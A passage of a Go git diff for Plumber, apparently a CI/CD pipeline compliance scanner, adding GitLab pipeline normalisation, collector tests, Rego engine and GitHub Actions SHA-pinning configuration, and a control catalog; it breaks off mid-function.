+ // GitLab serialises the access lists as arrays of role
+ // entries. The scalar `MinXxxAccessLevel` field on the
+ // upstream model stays zero because no API path populates
+ // it; reduce the arrays to a single int β the minimum
+ // access level required β so policies and consumers see
+ // the effective bar v0.2.x reported.
+ branch.MinPushAccessLevel = _minAccessLevel(p.PushAccessLevels)
+ branch.MinMergeAccessLevel = _minAccessLevel(p.MergeAccessLevels)
+ break
+ }
+ out = append(out, branch)
+ }
+ return out
+}
+
+// _minAccessLevel returns the smallest accessLevel found in the list,
+// matching how GitLab itself surfaces the "minimum required level"
+// for push or merge rules. Returns 0 when the list is empty.
+func _minAccessLevel(levels []gitlab.BranchProtectionAccessLevel) int {
+ min := 0
+ for i, l := range levels {
+ if i == 0 || l.AccessLevel < min {
+ min = l.AccessLevel
+ }
+ }
+ return min
+}
+
+// buildIncludes flattens pipelineOriginData.Origins into a list of
+// ir.Include entries. The Ref field carries the version the project
+// currently pins the include to; Current carries the upstream latest
+// version resolved by the collector (or empty if no Plumber metadata
+// is available for this origin). Path/AltPath expose normalized forms
+// for policy-side comparison, and OverriddenJobs enumerates the jobs
+// redefined locally with forbidden CI/CD keys.
+func buildIncludes(origin *GitlabPipelineOriginData) []ir.Include {
+ if origin == nil || len(origin.Origins) == 0 {
+ return nil
+ }
+ out := make([]ir.Include, 0, len(origin.Origins))
+ for i := range origin.Origins {
+ o := &origin.Origins[i]
+ inc := ir.Include{
+ Kind: o.OriginType,
+ Source: o.GitlabIncludeOrigin.Location,
+ Ref: o.Version,
+ Current: o.PlumberOrigin.LatestVersion,
+ Nested: o.Nested,
+ ComponentName: o.GitlabComponent.ComponentName,
+ OriginHash: o.OriginHash,
+ }
+ if inc.Source == "" && o.GitlabComponent.ComponentIncludePath != "" {
+ inc.Source = o.GitlabComponent.ComponentIncludePath
+ }
+ if inc.Current == "" && o.GitlabComponent.ComponentLatestVersion != "" {
+ inc.Current = o.GitlabComponent.ComponentLatestVersion
+ }
+ if inc.Source != "" {
+ inc.Path = utils.CleanOriginPath(inc.Source)
+ // Template matching also accepts the extension-less form.
+ trimmed := strings.TrimSuffix(inc.Path, ".yml")
+ trimmed = strings.TrimSuffix(trimmed, ".yaml")
+ if trimmed != inc.Path {
+ inc.AltPath = trimmed
+ }
+ }
+ if o.FromPlumber && o.PlumberOrigin.Path != "" && o.PlumberOrigin.Path != inc.Path {
+ // Plumber-augmented templates carry an authoritative path
+ // that differs from the raw GitLab include location.
+ if inc.Path == "" {
+ inc.Path = o.PlumberOrigin.Path
+ } else if inc.AltPath == "" || inc.AltPath == inc.Path {
+ inc.AltPath = o.PlumberOrigin.Path
+ }
+ }
+ inc.OverriddenJobs = CollectOverriddenJobs(o, origin)
+ out = append(out, inc)
+ }
+ return out
+}
+
+// CollectOverriddenJobs returns the jobs inherited from origin that were
+// locally redefined with forbidden CI/CD keys. The IR uses it to expose
+// override metadata to Rego policies; the PBOM generator reuses it so
+// both paths share the same rule for what counts as an override.
+func CollectOverriddenJobs(o *GitlabPipelineOriginDataFull, data *GitlabPipelineOriginData) []ir.OverriddenJob {
+ if o == nil || data == nil {
+ return nil
+ }
+ seen := make(map[string]bool)
+ var out []ir.OverriddenJob
+ for _, job := range o.Jobs {
+ if !job.IsOverridden || seen[job.Name] {
+ continue
+ }
+ seen[job.Name] = true
+ keys := forbiddenOverrideKeys(data.JobHardcodedContent[job.Name])
+ if len(keys) == 0 {
+ continue
+ }
+ out = append(out, ir.OverriddenJob{Name: job.Name, Keys: keys})
+ }
+ return out
+}
+
+func forbiddenOverrideKeys(job interface{}) []string {
+ if job == nil {
+ return nil
+ }
+ serializable := convertOverrideSerializable(job)
+ jobJSON, err := json.Marshal(serializable)
+ if err != nil {
+ return nil
+ }
+ matches := overridesRegex.FindAllSubmatch(jobJSON, -1)
+ if len(matches) == 0 {
+ return nil
+ }
+ seen := make(map[string]bool)
+ var keys []string
+ for _, m := range matches {
+ key := string(m[1])
+ if seen[key] {
+ continue
+ }
+ seen[key] = true
+ keys = append(keys, key)
+ }
+ return keys
+}
+
+func convertOverrideSerializable(input interface{}) interface{} {
+ switch v := input.(type) {
+ case map[interface{}]interface{}:
+ result := make(map[string]interface{}, len(v))
+ for key, value := range v {
+ keyStr, ok := key.(string)
+ if !ok {
+ keyStr = fmt.Sprintf("%v", key)
+ }
+ result[keyStr] = convertOverrideSerializable(value)
+ }
+ return result
+ case map[string]interface{}:
+ result := make(map[string]interface{}, len(v))
+ for key, value := range v {
+ result[key] = convertOverrideSerializable(value)
+ }
+ return result
+ case []interface{}:
+ result := make([]interface{}, len(v))
+ for i, item := range v {
+ result[i] = convertOverrideSerializable(item)
+ }
+ return result
+ default:
+ return v
+ }
+}
+
+func indexImagesByJob(images *GitlabPipelineImageData) map[string]ir.Image {
+ if images == nil {
+ return nil
+ }
+ out := make(map[string]ir.Image, len(images.Images))
+ for _, info := range images.Images {
+ out[info.Job] = imageFromInfo(info)
+ }
+ return out
+}
+
+func imageFromInfo(info GitlabPipelineImageInfo) ir.Image {
+ // info.Link may be "registry/name:tag" or "registry/name@sha256:..."
+ // info.Tag / info.Registry are already split by the collector.
+ img := ir.Image{
+ Name: info.Name,
+ Tag: info.Tag,
+ Registry: info.Registry,
+ }
+ if idx := strings.Index(info.Link, "@"); idx >= 0 {
+ img.Digest = info.Link[idx+1:]
+ }
+ return img
+}
+
+func buildJobs(origin *GitlabPipelineOriginData, imagesByJob map[string]ir.Image, ciConfigPath string) []ir.Job {
+ if origin == nil || len(origin.JobMap) == 0 {
+ return nil
+ }
+ // The raw CI YAML carries only the root-file job headers; jobs
+ // pulled in via include/component have a different source file
+ // that the collector does not track per-job yet. Scanning the
+ // root string at least covers hardcoded jobs, which is the main
+ // class of findings users click through.
+ lineByJob := scanGitLabJobLines(origin.ConfString)
+ originKindByJob := indexJobOriginKind(origin)
+ overrideKeysByJob := indexOverrideKeys(origin)
+ jobs := make([]ir.Job, 0, len(origin.JobMap))
+ for name, data := range origin.JobMap {
+ if data == nil {
+ continue
+ }
+ job := ir.Job{Name: name}
+ if img, ok := imagesByJob[name]; ok {
+ job.Image = &img
+ }
+ switch {
+ case origin.JobHardcodedMap != nil && origin.JobHardcodedMap[name]:
+ job.OriginKind = "hardcoded"
+ case originKindByJob[name] != "":
+ job.OriginKind = originKindByJob[name]
+ }
+ if data.IsOverridden {
+ job.Overridden = true
+ if keys := overrideKeysByJob[name]; len(keys) > 0 {
+ job.OverriddenKeys = keys
+ }
+ }
+ if line, ok := lineByJob[name]; ok {
+ job.OriginFile = ciConfigPath
+ job.OriginLine = line
+ }
+ enrichFromMergedConf(&job, name, origin.MergedConf)
+ enrichLocalVariables(&job, name, origin.Conf)
+ jobs = append(jobs, job)
+ }
+ // Deterministic order so the IR (and downstream findings) do not
+ // depend on Go's randomized map iteration.
+ sort.Slice(jobs, func(i, j int) bool { return jobs[i].Name < jobs[j].Name })
+ return jobs
+}
+
+// scanGitLabJobLines returns a map from top-level job name to its
+// 1-based line number in raw. Job headers are lines that start in
+// column 1 with `:`. Reserved GitLab keys (stages, variables,
+// include, workflow, default, image, services, before_script,
+// after_script, cache) are skipped. Anchors, YAML refs and nested
+// jobs are not modeled β this is a lightweight hint, not a parser.
+func scanGitLabJobLines(raw string) map[string]int {
+ out := map[string]int{}
+ if raw == "" {
+ return out
+ }
+ reserved := map[string]struct{}{
+ "stages": {}, "variables": {}, "default": {}, "include": {},
+ "workflow": {}, "image": {}, "services": {}, "before_script": {},
+ "after_script": {}, "cache": {},
+ }
+ header := regexp.MustCompile(`^([A-Za-z_][A-Za-z0-9_.:-]*)\s*:\s*(#.*)?$`)
+ for i, line := range strings.Split(raw, "\n") {
+ m := header.FindStringSubmatch(line)
+ if m == nil {
+ continue
+ }
+ name := m[1]
+ if _, skip := reserved[name]; skip {
+ continue
+ }
+ if _, seen := out[name]; seen {
+ continue
+ }
+ out[name] = i + 1
+ }
+ return out
+}
+
+// indexOverrideKeys returns a map of job name -> list of CI/CD keys
+// the project redefined when overriding an upstream definition.
+// Reuses CollectOverriddenJobs so the IR's per-job marker stays in
+// sync with the PBOM's "overriddenKeys" surface β both paths share
+// one definition of "what counts as an override".
+func indexOverrideKeys(origin *GitlabPipelineOriginData) map[string][]string {
+ if origin == nil {
+ return nil
+ }
+ out := make(map[string][]string)
+ for i := range origin.Origins {
+ o := &origin.Origins[i]
+ for _, ov := range CollectOverriddenJobs(o, origin) {
+ if _, seen := out[ov.Name]; seen {
+ continue
+ }
+ out[ov.Name] = ov.Keys
+ }
+ }
+ return out
+}
+
+// indexJobOriginKind walks origin.Origins and returns a map of job
+// name -> origin type ("component", "template", "local", "remote",
+// "project"). Plumber tracks how each job entered the merged config;
+// rules that should not punish projects for using upstream catalogs
+// (e.g. job_variable_override) consult this map to skip imported
+// jobs. Hardcoded jobs are handled via JobHardcodedMap and stay
+// out of this index.
+func indexJobOriginKind(origin *GitlabPipelineOriginData) map[string]string {
+ if origin == nil || len(origin.Origins) == 0 {
+ return nil
+ }
+ out := make(map[string]string)
+ for i := range origin.Origins {
+ o := &origin.Origins[i]
+ for _, job := range o.Jobs {
+ if _, seen := out[job.Name]; seen {
+ continue
+ }
+ out[job.Name] = o.OriginType
+ }
+ }
+ return out
+}
+
+// enrichLocalVariables sets job.LocalVariables to the variables block
+// authored directly in the project's CI file. Read from the raw,
+// pre-merge conf so upstream-component / template-defined variables
+// stay out: that distinction is what variable-override policies
+// (ISSUE-205) need to avoid punishing projects for variables their
+// catalogs already ship. When the project did not declare a local
+// `variables:` block on this job (or did not redeclare the job at
+// all), the field is left nil.
+func enrichLocalVariables(job *ir.Job, name string, conf *gitlab.GitlabCIConf) {
+ if conf == nil {
+ return
+ }
+ rawJob, ok := conf.GitlabJobs[name]
+ if !ok {
+ return
+ }
+ data, err := yaml.Marshal(rawJob)
+ if err != nil {
+ return
+ }
+ var parsed gitlab.GitlabJob
+ if err := yaml.Unmarshal(data, &parsed); err != nil {
+ return
+ }
+ if vars := extractGitLabVariables(parsed.Variables); len(vars) > 0 {
+ job.LocalVariables = vars
+ }
+}
+
+// enrichFromMergedConf harvests the GitLab CI merged configuration to
+// populate job.Services, job.Variables and job.Scripts. The merged
+// conf holds each job as an opaque interface{}; we YAML-round-trip it
+// into gitlab.GitlabJob so we can read the typed fields.
+func enrichFromMergedConf(job *ir.Job, name string, conf *gitlab.GitlabCIConf) {
+ if conf == nil {
+ return
+ }
+ rawJob, ok := conf.GitlabJobs[name]
+ if !ok {
+ return
+ }
+ data, err := yaml.Marshal(rawJob)
+ if err != nil {
+ return
+ }
+ var parsed gitlab.GitlabJob
+ if err := yaml.Unmarshal(data, &parsed); err != nil {
+ return
+ }
+ if svc := extractGitLabServices(parsed.Services); len(svc) > 0 {
+ job.Services = svc
+ }
+ if vars := extractGitLabVariables(parsed.Variables); len(vars) > 0 {
+ job.Variables = vars
+ }
+ // Concatenate `before_script`, `script` and `after_script` so
+ // every shell line β including hooks β is visible to scripts-
+ // scanning rules. The runtime executes all three blocks in the
+ // same shell context, which is also where shell-reparse and
+ // variable-injection patterns live. Track the source block per
+ // line so policies can echo it back in their findings.
+ var scripts []string
+ var blocks []string
+ for _, pair := range []struct {
+ name string
+ raw any
+ }{
+ {"before_script", parsed.BeforeScript},
+ {"script", parsed.Script},
+ {"after_script", parsed.AfterScript},
+ } {
+ for _, line := range extractGitLabScripts(pair.raw) {
+ scripts = append(scripts, line)
+ blocks = append(blocks, pair.name)
+ }
+ }
+ if len(scripts) > 0 {
+ job.Scripts = scripts
+ job.ScriptBlocks = blocks
+ }
+ if af, ok := parsed.AllowFailure.(bool); ok {
+ job.AllowFailure = af
+ }
+ if w, ok := parsed.When.(string); ok {
+ job.When = w
+ }
+ if rules := extractGitLabRules(parsed.Rules); len(rules) > 0 {
+ job.Rules = rules
+ }
+}
+
+// extractGitLabRules normalises the polymorphic `rules:` block into a
+// slice of {key: any} maps. yaml.v2 nests as map[interface{}]any
+// while v3 uses map[string]any; convert recursively to the latter so
+// the IR can be JSON-marshalled (Go's json package refuses non-string
+// map keys) and policies see a single shape.
+func extractGitLabRules(v any) []map[string]any {
+ list, ok := v.([]any)
+ if !ok {
+ return nil
+ }
+ out := make([]map[string]any, 0, len(list))
+ for _, entry := range list {
+ if m, ok := normalizeYAMLValue(entry).(map[string]any); ok && len(m) > 0 {
+ out = append(out, m)
+ }
+ }
+ return out
+}
+
+// normalizeYAMLValue recursively walks a value coming out of yaml.v2
+// and rewrites every map[interface{}]interface{} as map[string]any
+// so the result is JSON-marshallable.
+func normalizeYAMLValue(v any) any {
+ switch x := v.(type) {
+ case map[interface{}]interface{}:
+ out := make(map[string]any, len(x))
+ for k, val := range x {
+ ks, ok := k.(string)
+ if !ok {
+ continue
+ }
+ out[ks] = normalizeYAMLValue(val)
+ }
+ return out
+ case map[string]interface{}:
+ out := make(map[string]any, len(x))
+ for k, val := range x {
+ out[k] = normalizeYAMLValue(val)
+ }
+ return out
+ case []interface{}:
+ out := make([]any, len(x))
+ for i, item := range x {
+ out[i] = normalizeYAMLValue(item)
+ }
+ return out
+ }
+ return v
+}
+
+// extractGitLabServices normalizes the polymorphic services: block
+// (list of strings, list of {name: β¦} maps) into a flat list of
+// ir.Image entries.
+func extractGitLabServices(v any) []ir.Image {
+ list, ok := v.([]any)
+ if !ok {
+ return nil
+ }
+ out := make([]ir.Image, 0, len(list))
+ for _, item := range list {
+ switch s := item.(type) {
+ case string:
+ out = append(out, splitServiceRef(s))
+ case map[any]any:
+ if name, ok := s["name"].(string); ok {
+ out = append(out, splitServiceRef(name))
+ }
+ }
+ }
+ return out
+}
+
+// extractGitLabVariables collapses the YAML-typed variables map into a
+// stringβstring map so Rego sees everything as plain strings.
+func extractGitLabVariables(v map[string]any) map[string]string {
+ if len(v) == 0 {
+ return nil
+ }
+ out := make(map[string]string, len(v))
+ for k, val := range v {
+ out[k] = fmt.Sprintf("%v", val)
+ }
+ return out
+}
+
+// extractGitLabScripts flattens the polymorphic `script:` block (can
+// be a single string or a list) into a list of script lines.
+func extractGitLabScripts(v any) []string {
+ switch s := v.(type) {
+ case string:
+ return []string{s}
+ case []any:
+ out := make([]string, 0, len(s))
+ for _, line := range s {
+ if str, ok := line.(string); ok {
+ out = append(out, str)
+ }
+ }
+ return out
+ }
+ return nil
+}
+
+func splitServiceRef(ref string) ir.Image {
+ if idx := strings.LastIndex(ref, ":"); idx > 0 {
+ return ir.Image{Name: ref[:idx], Tag: ref[idx+1:]}
+ }
+ return ir.Image{Name: ref}
+}
diff --git a/collector/gitlab_ir_test.go b/collector/gitlab_ir_test.go
new file mode 100644
index 0000000..6c4d2e7
--- /dev/null
+++ b/collector/gitlab_ir_test.go
@@ -0,0 +1,81 @@
+package collector
+
+import (
+ "testing"
+
+ "github.com/getplumber/plumber/internal/ir"
+)
+
+func TestToNormalizedPipeline_Empty(t *testing.T) {
+ pipeline := ToNormalizedPipeline("group/project", "main", "", nil, nil, nil)
+ if pipeline.Provider != ir.ProviderGitLab {
+ t.Fatalf("expected provider gitlab, got %q", pipeline.Provider)
+ }
+ if pipeline.ProjectPath != "group/project" {
+ t.Fatalf("expected project path propagated, got %q", pipeline.ProjectPath)
+ }
+ if pipeline.DefaultBranch != "main" {
+ t.Fatalf("expected default branch propagated, got %q", pipeline.DefaultBranch)
+ }
+ if len(pipeline.Jobs) != 0 {
+ t.Fatalf("expected no jobs, got %d", len(pipeline.Jobs))
+ }
+}
+
+func TestToNormalizedPipeline_JobsAndImages(t *testing.T) {
+ origin := &GitlabPipelineOriginData{
+ JobMap: map[string]*GitlabPipelineJobData{
+ "build": {Name: "build"},
+ "deploy": {Name: "deploy"},
+ "lint": {Name: "lint"},
+ },
+ }
+ images := &GitlabPipelineImageData{
+ Images: []GitlabPipelineImageInfo{
+ {Job: "build", Link: "docker.io/alpine:3.20", Name: "alpine", Tag: "3.20"},
+ {Job: "deploy", Link: "registry.example.com/deployer@sha256:abcdef", Name: "deployer"},
+ },
+ }
+
+ pipeline := ToNormalizedPipeline("grp/proj", "main", "", origin, images, nil)
+
+ if got := len(pipeline.Jobs); got != 3 {
+ t.Fatalf("expected 3 jobs, got %d", got)
+ }
+
+ // Sorted alphabetically: build, deploy, lint
+ names := []string{pipeline.Jobs[0].Name, pipeline.Jobs[1].Name, pipeline.Jobs[2].Name}
+ expected := []string{"build", "deploy", "lint"}
+ for i := range names {
+ if names[i] != expected[i] {
+ t.Fatalf("jobs[%d]: expected %q, got %q", i, expected[i], names[i])
+ }
+ }
+
+ if pipeline.Jobs[0].Image == nil || pipeline.Jobs[0].Image.Tag != "3.20" {
+ t.Fatalf("build job image: expected tag 3.20, got %+v", pipeline.Jobs[0].Image)
+ }
+ if pipeline.Jobs[1].Image == nil || pipeline.Jobs[1].Image.Digest != "sha256:abcdef" {
+ t.Fatalf("deploy job image: expected digest sha256:abcdef, got %+v", pipeline.Jobs[1].Image)
+ }
+ if pipeline.Jobs[2].Image != nil {
+ t.Fatalf("lint job: expected no image, got %+v", pipeline.Jobs[2].Image)
+ }
+}
+
+func TestToNormalizedPipeline_NilJobInMap(t *testing.T) {
+ origin := &GitlabPipelineOriginData{
+ JobMap: map[string]*GitlabPipelineJobData{
+ "valid": {Name: "valid"},
+ "corrupted": nil,
+ },
+ }
+
+ pipeline := ToNormalizedPipeline("grp/proj", "main", "", origin, nil, nil)
+ if got := len(pipeline.Jobs); got != 1 {
+ t.Fatalf("expected 1 job (nil entry skipped), got %d", got)
+ }
+ if pipeline.Jobs[0].Name != "valid" {
+ t.Fatalf("expected valid job kept, got %q", pipeline.Jobs[0].Name)
+ }
+}
diff --git a/collector/testmain_test.go b/collector/testmain_test.go
new file mode 100644
index 0000000..ad98615
--- /dev/null
+++ b/collector/testmain_test.go
@@ -0,0 +1,16 @@
+package collector
+
+import (
+ "os"
+ "testing"
+)
+
+// TestMain disables the GitHub metadata enrichment for collector
+// tests. Dedicated tests that need the client can override by
+// unsetting PLUMBER_DISABLE_GITHUB_API in their t.Setenv scope.
+func TestMain(m *testing.M) {
+ if err := os.Setenv("PLUMBER_DISABLE_GITHUB_API", "1"); err != nil {
+ panic(err)
+ }
+ os.Exit(m.Run())
+}
diff --git a/configuration/plumberconfig.go b/configuration/plumberconfig.go
index 4f222e1..e10f0cd 100644
--- a/configuration/plumberconfig.go
+++ b/configuration/plumberconfig.go
@@ -57,6 +57,9 @@ var validControlSchema = map[string][]string{
"pipelineMustNotUseDockerInDocker": {
"enabled", "detectInsecureDaemon",
},
+ "actionsMustBePinnedByCommitSha": {
+ "enabled", "trustedOwners",
+ },
}
// validControlKeys returns the list of known control names.
@@ -75,6 +78,9 @@ func ValidControlNames() []string {
return names
}
+// validEngineKeys lists the sub-keys recognized under the top-level "engine" section.
+var validEngineKeys = []string{"enabled"}
+
// ValidFlatKeys returns every valid flattened key path recognized by the
// schema, e.g. "controls.branchMustBeProtected.enabled". This includes
// keys that may be commented out in the default config file.
@@ -85,6 +91,9 @@ func ValidFlatKeys() map[string]struct{} {
keys["controls."+control+"."+sub] = struct{}{}
}
}
+ for _, sub := range validEngineKeys {
+ keys["engine."+sub] = struct{}{}
+ }
return keys
}
@@ -95,6 +104,28 @@ type PlumberConfig struct {
// Controls configuration
Controls ControlsConfig `yaml:"controls"`
+
+ // Engine configuration for the Rego/OPA rule engine (multi-provider refactor).
+ // When nil or Enabled is false, the legacy Go controls run as today.
+ Engine *EngineConfig `yaml:"engine,omitempty"`
+}
+
+// EngineConfig configures the Rego/OPA rule engine introduced by the
+// multi-provider refactor.
+type EngineConfig struct {
+ // Enabled turns on the Rego/OPA rule engine. Default: true.
+ // The engine runs in shadow mode alongside the legacy Go controls
+ // until they are removed β see docs/REFACTOR_MULTI_PROVIDER.md Β§8.
+ Enabled *bool `yaml:"enabled,omitempty"`
+}
+
+// IsEngineEnabled returns true when the Rego/OPA engine must run.
+// Defaults to true when the section, the field, or the config itself is nil.
+func (c *PlumberConfig) IsEngineEnabled() bool {
+ if c == nil || c.Engine == nil || c.Engine.Enabled == nil {
+ return true
+ }
+ return *c.Engine.Enabled
}
// ControlsConfig holds configuration for all controls
@@ -140,6 +171,32 @@ type ControlsConfig struct {
// PipelineMustNotUseDockerInDocker control configuration
PipelineMustNotUseDockerInDocker *DockerInDockerControlConfig `yaml:"pipelineMustNotUseDockerInDocker,omitempty"`
+
+ // ActionsMustBePinnedByCommitSha control configuration (GitHub Actions only)
+ ActionsMustBePinnedByCommitSha *ActionsPinnedByShaControlConfig `yaml:"actionsMustBePinnedByCommitSha,omitempty"`
+}
+
+// ActionsPinnedByShaControlConfig configures the GitHub Actions supply-
+// chain pinning check (ISSUE-104). Only meaningful on GitHub workflows.
+type ActionsPinnedByShaControlConfig struct {
+ // Enabled controls whether this check runs
+ Enabled *bool `yaml:"enabled,omitempty"`
+
+ // TrustedOwners lists action-owner prefixes that are exempt from the
+ // pin-by-SHA requirement. Only owners inside the workflow's existing
+ // trust boundary should be listed here β "actions" and "github"
+ // cover the first-party GitHub-owned actions the runtime trusts
+ // implicitly. Adding a third-party owner here re-opens the exact
+ // supply-chain risk the check exists to close.
+ TrustedOwners []string `yaml:"trustedOwners,omitempty"`
+}
+
+// IsEnabled returns whether the control is enabled
+func (c *ActionsPinnedByShaControlConfig) IsEnabled() bool {
+ if c == nil || c.Enabled == nil {
+ return false
+ }
+ return *c.Enabled
}
// ImageForbiddenTagsControlConfig configuration for the forbidden image tags control
diff --git a/configuration/plumberconfig_test.go b/configuration/plumberconfig_test.go
index 4a57aed..96c4780 100644
--- a/configuration/plumberconfig_test.go
+++ b/configuration/plumberconfig_test.go
@@ -318,6 +318,7 @@ func TestValidControlNames(t *testing.T) {
names := ValidControlNames()
expected := []string{
+ "actionsMustBePinnedByCommitSha",
"branchMustBeProtected",
"containerImageMustComeFromAuthorizedSources",
"containerImageMustNotUseForbiddenTags",
diff --git a/control/catalog.go b/control/catalog.go
new file mode 100644
index 0000000..b809d13
--- /dev/null
+++ b/control/catalog.go
@@ -0,0 +1,230 @@
+package control
+
+import (
+ "github.com/getplumber/plumber/configuration"
+ opaengine "github.com/getplumber/plumber/internal/engine/opa"
+)
+
+// ControlEntry is the canonical per-control view consumed by the
+// analyze renderer, the MR comment builder and any future output path.
+// Compliance is derived from the Rego Findings list (binary: 100 when
+// no finding matches the ControlName, 0 when at least one does);
+// Skipped reflects whether the user disabled the control in
+// .plumber.yaml. DisplayName is the user-facing title.
+type ControlEntry struct {
+ DisplayName string
+ ControlName string
+ Skipped bool
+ Compliance float64
+}
+
+// GitLabControls returns the catalog of GitLab compliance controls
+// in their canonical display order. Each entry is emitted regardless
+// of whether the user defined the section in .plumber.yaml β absent
+// config is treated as "disabled". The caller typically fills in the
+// findings-derived compliance by looking up FindingsByControl.
+func GitLabControls(pc *configuration.PlumberConfig) []ControlEntry {
+ if pc == nil {
+ return nil
+ }
+ c := &pc.Controls
+ entries := make([]ControlEntry, 0, 14)
+
+ // Container images must not use forbidden tags
+ if cfg := c.ContainerImageMustNotUseForbiddenTags; cfg != nil {
+ name := "Container images must not use forbidden tags"
+ if cfg.IsPinnedByDigestRequired() {
+ name = "Container images must not use forbidden tags (pinned by digest)"
+ }
+ entries = append(entries, ControlEntry{
+ DisplayName: name,
+ ControlName: "containerImageMustNotUseForbiddenTags",
+ Skipped: !cfg.IsEnabled(),
+ })
+ }
+ if cfg := c.ContainerImageMustComeFromAuthorizedSources; cfg != nil {
+ entries = append(entries, ControlEntry{
+ DisplayName: "Container images must come from authorized sources",
+ ControlName: "containerImageMustComeFromAuthorizedSources",
+ Skipped: !cfg.IsEnabled(),
+ })
+ }
+ if cfg := c.BranchMustBeProtected; cfg != nil {
+ entries = append(entries, ControlEntry{
+ DisplayName: "Branch must be protected",
+ ControlName: "branchMustBeProtected",
+ Skipped: !cfg.IsEnabled(),
+ })
+ }
+ if cfg := c.PipelineMustNotIncludeHardcodedJobs; cfg != nil {
+ entries = append(entries, ControlEntry{
+ DisplayName: "Pipeline must not include hardcoded jobs",
+ ControlName: "pipelineMustNotIncludeHardcodedJobs",
+ Skipped: !cfg.IsEnabled(),
+ })
+ }
+ if cfg := c.IncludesMustBeUpToDate; cfg != nil {
+ entries = append(entries, ControlEntry{
+ DisplayName: "Includes must be up to date",
+ ControlName: "includesMustBeUpToDate",
+ Skipped: !cfg.IsEnabled(),
+ })
+ }
+ if cfg := c.IncludesMustNotUseForbiddenVersions; cfg != nil {
+ entries = append(entries, ControlEntry{
+ DisplayName: "Includes must not use forbidden versions",
+ ControlName: "includesMustNotUseForbiddenVersions",
+ Skipped: !cfg.IsEnabled(),
+ })
+ }
+ if cfg := c.PipelineMustIncludeComponent; cfg != nil {
+ entries = append(entries, ControlEntry{
+ DisplayName: "Pipeline must include required components",
+ ControlName: "pipelineMustIncludeComponent",
+ Skipped: !cfg.IsEnabled(),
+ })
+ }
+ if cfg := c.PipelineMustIncludeTemplate; cfg != nil {
+ entries = append(entries, ControlEntry{
+ DisplayName: "Pipeline must include required templates",
+ ControlName: "pipelineMustIncludeTemplate",
+ Skipped: !cfg.IsEnabled(),
+ })
+ }
+ if cfg := c.PipelineMustNotEnableDebugTrace; cfg != nil {
+ entries = append(entries, ControlEntry{
+ DisplayName: "Pipeline must not enable debug trace",
+ ControlName: "pipelineMustNotEnableDebugTrace",
+ Skipped: !cfg.IsEnabled(),
+ })
+ }
+ if cfg := c.PipelineMustNotUseUnsafeVariableExpansion; cfg != nil {
+ entries = append(entries, ControlEntry{
+ DisplayName: "Pipeline must not use unsafe variable expansion",
+ ControlName: "pipelineMustNotUseUnsafeVariableExpansion",
+ Skipped: !cfg.IsEnabled(),
+ })
+ }
+ if cfg := c.SecurityJobsMustNotBeWeakened; cfg != nil {
+ entries = append(entries, ControlEntry{
+ DisplayName: "Security jobs must not be weakened",
+ ControlName: "securityJobsMustNotBeWeakened",
+ Skipped: !cfg.IsEnabled(),
+ })
+ }
+ if cfg := c.PipelineMustNotExecuteUnverifiedScripts; cfg != nil {
+ entries = append(entries, ControlEntry{
+ DisplayName: "Pipeline must not execute unverified scripts",
+ ControlName: "pipelineMustNotExecuteUnverifiedScripts",
+ Skipped: !cfg.IsEnabled(),
+ })
+ }
+ if cfg := c.PipelineMustNotOverrideJobVariables; cfg != nil {
+ entries = append(entries, ControlEntry{
+ DisplayName: "Pipeline must not override job variables",
+ ControlName: "pipelineMustNotOverrideJobVariables",
+ Skipped: !cfg.IsEnabled(),
+ })
+ }
+ if cfg := c.PipelineMustNotUseDockerInDocker; cfg != nil {
+ entries = append(entries, ControlEntry{
+ DisplayName: "Pipeline must not use Docker-in-Docker",
+ ControlName: "pipelineMustNotUseDockerInDocker",
+ Skipped: !cfg.IsEnabled(),
+ })
+ }
+ return entries
+}
+
+// DisabledControlNames returns the set of control names the user has
+// explicitly disabled in .plumber.yaml (controls present in the config
+// with `enabled: false`). Controls absent from the config are NOT
+// included β they fall back to the embedded default which has them
+// enabled.
+func DisabledControlNames(pc *configuration.PlumberConfig) map[string]bool {
+ out := map[string]bool{}
+ if pc == nil {
+ return out
+ }
+ c := &pc.Controls
+ if cfg := c.ContainerImageMustNotUseForbiddenTags; cfg != nil && !cfg.IsEnabled() {
+ out["containerImageMustNotUseForbiddenTags"] = true
+ }
+ if cfg := c.ContainerImageMustComeFromAuthorizedSources; cfg != nil && !cfg.IsEnabled() {
+ out["containerImageMustComeFromAuthorizedSources"] = true
+ }
+ if cfg := c.BranchMustBeProtected; cfg != nil && !cfg.IsEnabled() {
+ out["branchMustBeProtected"] = true
+ }
+ if cfg := c.PipelineMustNotIncludeHardcodedJobs; cfg != nil && !cfg.IsEnabled() {
+ out["pipelineMustNotIncludeHardcodedJobs"] = true
+ }
+ if cfg := c.IncludesMustBeUpToDate; cfg != nil && !cfg.IsEnabled() {
+ out["includesMustBeUpToDate"] = true
+ }
+ if cfg := c.IncludesMustNotUseForbiddenVersions; cfg != nil && !cfg.IsEnabled() {
+ out["includesMustNotUseForbiddenVersions"] = true
+ }
+ if cfg := c.PipelineMustIncludeComponent; cfg != nil && !cfg.IsEnabled() {
+ out["pipelineMustIncludeComponent"] = true
+ }
+ if cfg := c.PipelineMustIncludeTemplate; cfg != nil && !cfg.IsEnabled() {
+ out["pipelineMustIncludeTemplate"] = true
+ }
+ if cfg := c.PipelineMustNotEnableDebugTrace; cfg != nil && !cfg.IsEnabled() {
+ out["pipelineMustNotEnableDebugTrace"] = true
+ }
+ if cfg := c.PipelineMustNotUseUnsafeVariableExpansion; cfg != nil && !cfg.IsEnabled() {
+ out["pipelineMustNotUseUnsafeVariableExpansion"] = true
+ }
+ if cfg := c.SecurityJobsMustNotBeWeakened; cfg != nil && !cfg.IsEnabled() {
+ out["securityJobsMustNotBeWeakened"] = true
+ }
+ if cfg := c.PipelineMustNotExecuteUnverifiedScripts; cfg != nil && !cfg.IsEnabled() {
+ out["pipelineMustNotExecuteUnverifiedScripts"] = true
+ }
+ if cfg := c.PipelineMustNotOverrideJobVariables; cfg != nil && !cfg.IsEnabled() {
+ out["pipelineMustNotOverrideJobVariables"] = true
+ }
+ if cfg := c.PipelineMustNotUseDockerInDocker; cfg != nil && !cfg.IsEnabled() {
+ out["pipelineMustNotUseDockerInDocker"] = true
+ }
+ if cfg := c.ActionsMustBePinnedByCommitSha; cfg != nil && !cfg.IsEnabled() {
+ out["actionsMustBePinnedByCommitSha"] = true
+ }
+ return out
+}
+
+// FilterFindingsByEnabledControls drops findings whose ControlName is
+// disabled in pc. Findings whose code is unknown or has no ControlName
+// are kept (defensive: better surfaced than silently swallowed).
+func FilterFindingsByEnabledControls(findings []opaengine.Finding, pc *configuration.PlumberConfig) []opaengine.Finding {
+ disabled := DisabledControlNames(pc)
